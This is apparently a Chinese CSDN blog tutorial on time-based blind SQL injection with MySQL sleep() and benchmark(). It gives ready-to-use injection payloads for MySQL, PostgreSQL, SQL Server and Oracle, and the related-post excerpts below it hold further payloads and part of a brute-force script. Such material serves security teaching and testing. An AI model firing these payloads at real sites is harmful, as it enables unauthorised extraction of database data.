【sql注入-延时注入】sleep()、benchmark()函数 延时注入

最新推荐文章于 2025-03-19 22:49:39 发布
最新推荐文章于 2025-03-19 22:49:39 发布
阅读量9.4k 收藏 28
点赞数 3
分类专栏: 【黑色地带-实战中心】 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/131639804
版权
文章详细介绍了数据库中的sleep()和benchmark()函数用于延时注入的原理和用法,包括在MySQL中的应用,以及如何通过if()和CASEWHEN语句构造条件。同时提到了不同数据库如PostgreSQL、MicrosoftSQLServer和Oracle中类似功能的函数或语句,并给出了相应的Payload示例。此外,文章还涉及了网络安全的上下文。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

sleep()、benchmark()延时注入

一、语法介绍:

二、延时注入

三、不同数据库

网络安全小圈子

sleep()、benchmark()延时注入

一、语法介绍:

版本:

sleep()    MySQL>5.7.8

benchmark()  MySQL>5.7.5

语法:

 

使用:

SELECT SLEEP(10);

延迟10s

 

SELECT BENCHMARK(1000000, SHA1('Hello World'));

查询将会执行100万次SHA1哈希算法计算,并返回结果(别瞎搞)

然后我又多加了一个0

 

二、延时注入

if示例:

加上判断函数if()

if(a,b,c),如果a的值为true,则返回b的值,如果a的值为false,则返回c的值

?id=1’ and if ((ascii(substr(database(),0,1))>100),sleep(10),1) --+

sleep(if(database()="security",10,0))

if(now()=sysdate(),sleep(length(database())),0)

//now(): 这是MySQL的一个内置函数,返回当前日期和时间。

//sysdate(): 这也是MySQL的一个内置函数,返回系统日期和时间。

//length(database()): 这是一个内置函数,返回当前数据库名的长度。

//sleep(): 这是MySQL的一个内置函数,用于在执行语句时暂停指定的秒数。

代码的逻辑:

如果now()返回的当前日期和时间与sysdate()返回的系统日期和时间相等(即条件成立),
那么执行sleep(length(database()))函数,即暂停秒数等于当前数据库名长度的时间,
否则返回0

case when示例

CASE WHEN condition1 THEN result1
WHEN condition2 THEN result2
ELSE result3
END

其中,condition1 和 condition2 是条件表达式,result1、result2 和 result3 是根据条件表达式返回的结果。如果所有条件都不满足,则返回 result3

'%3bselect case when (1=1) then sleep(10) else sleep(0) end --

这是一个条件语句,用于在查询中执行延时函数 sleep()。如果条件 (1=1) 成立,将执行 sleep(10) 函数,即暂停 10 秒钟;否则执行 sleep(0) 函数,即不进行延时

payload:

' OR SLEEP(5)#

' OR BENCHMARK(1000000,SHA1('test'))#

if(now()=sysdate(),sleep(length(database())),0)

'%3bselect case when (1=1) then pg_sleep(10) else pg_sleep(0) end --

三、不同数据库

  1. MySQL的SLEEP()函数:
       - 函数作用:让数据库休眠指定的时间(以秒为单位)。
       - Payload示例:' OR SLEEP(5) --

  2. PostgreSQL的pg_sleep()函数:
       - 函数作用:让数据库休眠指定的时间(以秒为单位)。
       - Payload示例:' OR pg_sleep(5) --

  3. Microsoft SQL Server的WAITFOR DELAY语句:
       - 语句作用:让数据库休眠指定的时间(以毫秒为单位)。
       - Payload示例:' OR WAITFOR DELAY '0:0:5' --

  4. Oracle的DBMS_LOCK.SLEEP()函数:
       - 函数作用:让数据库休眠指定的时间(以秒为单位)。
       - Payload示例:' OR DBMS_LOCK.SLEEP(5) --

网络安全小圈子

README.md · 书半生/网络安全知识体系-实战中心 - 码云 - 开源中国 (gitee.com)正在上传…重新上传取消https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.mdicon-default.png?t=N658https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.md

GitHub - BLACKxZONE/Treasure_knowledge正在上传…重新上传取消https://github.com/BLACKxZONE/Treasure_knowledgeicon-default.png?t=N658https://github.com/BLACKxZONE/Treasure_knowledge

sql注入延时注入
weixin_45653478的博客
04-09 2842
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
SQL注入-06】延时注入案例
m0_64378913的博客
04-26 2828
1 概述 当改变浏览器传给后台SQL的参数后, 浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入;同时,输入参数为真或假也无法从页面显示上查出差异,无法使用布尔注入 ,这时候可以试试看能否使用延时注入延时盲注:也称延时注入、时间注入等,这种注入方式在传给后台的参数中,设置了一个if语句,当条件为真时执行sleep语句,条件为假时无执行语句,然后根据浏览器的响应时间来推测sleep语句是否被执行,进而推测if条件是否为真。 延时盲注与布尔盲注的核心思想都是通过浏览器两种
SQL注入延时盲注原理与应用
最新发布
lubiii_的博客
03-19 1071
' AND (SELECT CASE WHEN (条件) THEN SLEEP(5) ELSE 0 END)--' AND (SELECT 1 FROM (SELECT SLEEP(5))a WHERE 条件)--' AND IF(条件, BENCHMARK(10000000,MD5('test')), 0)--IF(条件, BENCHMARK(10000000,MD5('a')), 0)IF(条件, SLEEP(5), 0) -- 条件为真时延时5秒。条件为真时延时,为假时触发除零错误(页面异常)。
sql注入------基于时间延迟benchmark函数注入脚本
weixin_30291791的博客
11-28 468
#author:windy_2import requests urlx = 'http://127.0.0.1/?id= 1 and if((substr((select database()),' payloads = 'qwertyuiopasdfghjklzxcvbnm{}_0123456789' def guess_column(table): string = '...
SQL注入延时注入
热门推荐
秋水的博客
09-01 2万+
延时注入简介 个人理解: 延时注入又称时间盲注,也是盲注的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据/ 应用场景: 延时注入的应用场景是,在我们输入and 1或者and 0的时候,页面的返回无变化,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入 相关函数 延时注入会用到布尔盲注的所有...
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 5158
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
4.3SQL注入延时注入
qq_64177395的博客
09-04 1085
mid(a,b,c): 从b开始,截取a字符串的c位。substr(a,b,c): 从b开始,截取字符串a的c长度。参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。if(a,b,c):可以理解在java程序中的三目运算符,a条件成立 执行b, 条件不成立,执行c。1.防止引号 ‘ “ 转义。
SQL注入手册-时间延迟注入
jdk12123的博客
09-01 2241
时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型注入获取数据而采用一种突破注入的技巧。在 mysql函数 sleep()延时的意思,sleep(10)就是 数据库延时 10 秒返回内容。判断注入可以使用’and sleep(10) 数据库延时 10 秒返回值 网页响应时间至少要 10 秒 根据这个原理来判断存在 SQL 时间注入。mysql 延时注入用到的函数 sleep() 、if()、substring()
sql注入-延时注入
课嗨教育的专栏
04-28 1652
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 延时注入和布尔盲注差不多 为什么要延时 因为有的时候我们知道这个地方存在注入但是页面返回信息一样 加了个if延时条件判断 if(条件,是,否) http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201 返回14秒 http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(
SQL 注入之报错注入延时注入、布尔盲注
2301_77160226的博客
08-27 1538
SQL 注入攻击中,报错注入延时注入和布尔盲注是常见的攻击手段。这些攻击方式利用了数据库系统在处理用户输入时的漏洞,从而获取敏感信息或者执行恶意操作。本文将详细介绍这三种 SQL 注入攻击方式的原理和实现方法。
sql注入字典fuzz
01-11
6. **数据库特定功能**:例如MySQL特有的`sleep`函数可用于延时注入测试;`information_schema`可用来获取数据库的信息;`concat_ws()`、`substring`等函数则可以用来拼接或截取字符串。 7. **控制流语句**:如`IF`,...
Sql注入漏洞汇总-
黑战士的博客
06-04 812
DNSlog注入,也叫DNS带外查询,它是属于带外通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的,比如正常的get注入,先在url上插入payload做HTTP请求,然后得到HTTP返回包,没有涉及其他信道。而所谓的带外通信,至少涉及两个信道信道:在计算机中指通信的通道,是信号传输的媒介。
SQL注入各种注入原理|绕过技巧|带实例详解|
没有
03-19 8490
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击、SQL注入绕过技术、sql注入修复建议
sql注入之时间注入
m0_63436163的博客
04-15 1044
如果想要获取数据内容,可以用截取字符再进行字符对比,如果相同就进行延时。这样就能获取字符,接着再拼接就是当前库的内容。在黑盒模式下可以使用 sqlmap 对注入检测。sqlmap 支持多种数据库注入,而且支持多种注入方式。在页面中分析源码,直接获取 name 带进数据库进行查询,但是是否存在记录页面返回都一样。--technique=T 检测方法为时间注入-u 表示检测的 url。-p 指定的检测参数。
SQL注入之时间延迟型注入
DM766924的博客
09-16 1614
时间延迟型注入 原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数sleepbenchmark 以上操作也可以反过来。适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。 时间延迟注入常用SQL函数介绍 if(condition,expr1,expr2)功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定举例:select
SQL注入sleep注入
weixin_43765321的博客
03-02 7246
1. MySQL中的sleep函数 在MySQL中执行select sleep(N)可以让此语句运行N秒钟,例如下图所示: Sleep函数的主要用途在于确定MySQL语句是否真正被执行了。比如下面语句执行时间为0.00秒,线程信息一闪而过,根本无从察觉。 这种情况下,我们通过在语句中添加一个sleep(N)函数,强制让语句停留1秒钟,来查看后台线程,例如下图所示: 但是你使用这个办法,是有前提的,它只能指定条件的记录存在时机会停止指定的秒数,比如咱们的库里并没有pig,查询条件设置为name= 'pi
SQL注入延时注入
qq_45557130的博客
10-07 1678
sql注入延时注入
SQL注入sleep函数替换
01-27
### SQL 注入中 `SLEEP` 函数的替代方案 在某些情况下,由于服务器配置或环境限制,`SLEEP()` 函数可能无法使用。此时可以通过其他方法实现类似的延迟效果,从而完成基于时间的盲注攻击。 #### 使用 `BENCHMARK()` 函数 `BENCHMARK()` 函数用于重复执行表达式指定次数,这会消耗一定的时间资源。如果给定足够大的迭代次数,则可以达到显著的延迟效果: ```sql AND IF(ASCII(SUBSTRING(database(),1,1))=115,BENCHMARK(1000000,ENCODE('A','by 4-byte random string')),NULL) ``` 此命令尝试将字符 'A' 编码一百万次,当条件成立时将会造成明显的查询延迟[^2]。 #### 利用复杂计算操作 构建复杂的数学运算也可以增加处理耗时。例如嵌套多个三角函数调用来制造额外负载: ```sql AND IF(ASCII(SUBSTRING(database(),1,1))=115,POW(TAN(ATAN(...)),2),NULL) ``` 这里省略号代表进一步深层次嵌套更多相同类型的函数调用以延长整个过程所需时间[^3]。 #### 数据库锁定机制 对于支持事务隔离级别的数据库系统来说,故意创建未提交读写冲突也是一种可行策略。比如开启新连接后启动事务并立即更新某条记录而不提交,在另一端发起注入测试的同时保持该状态直到超时发生为止[^4]。 这些技术手段均能在特定条件下有效模拟 `SLEEP()` 行为,但实际应用需考虑目标平台特性以及潜在风险因素的影响。
评论 20
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值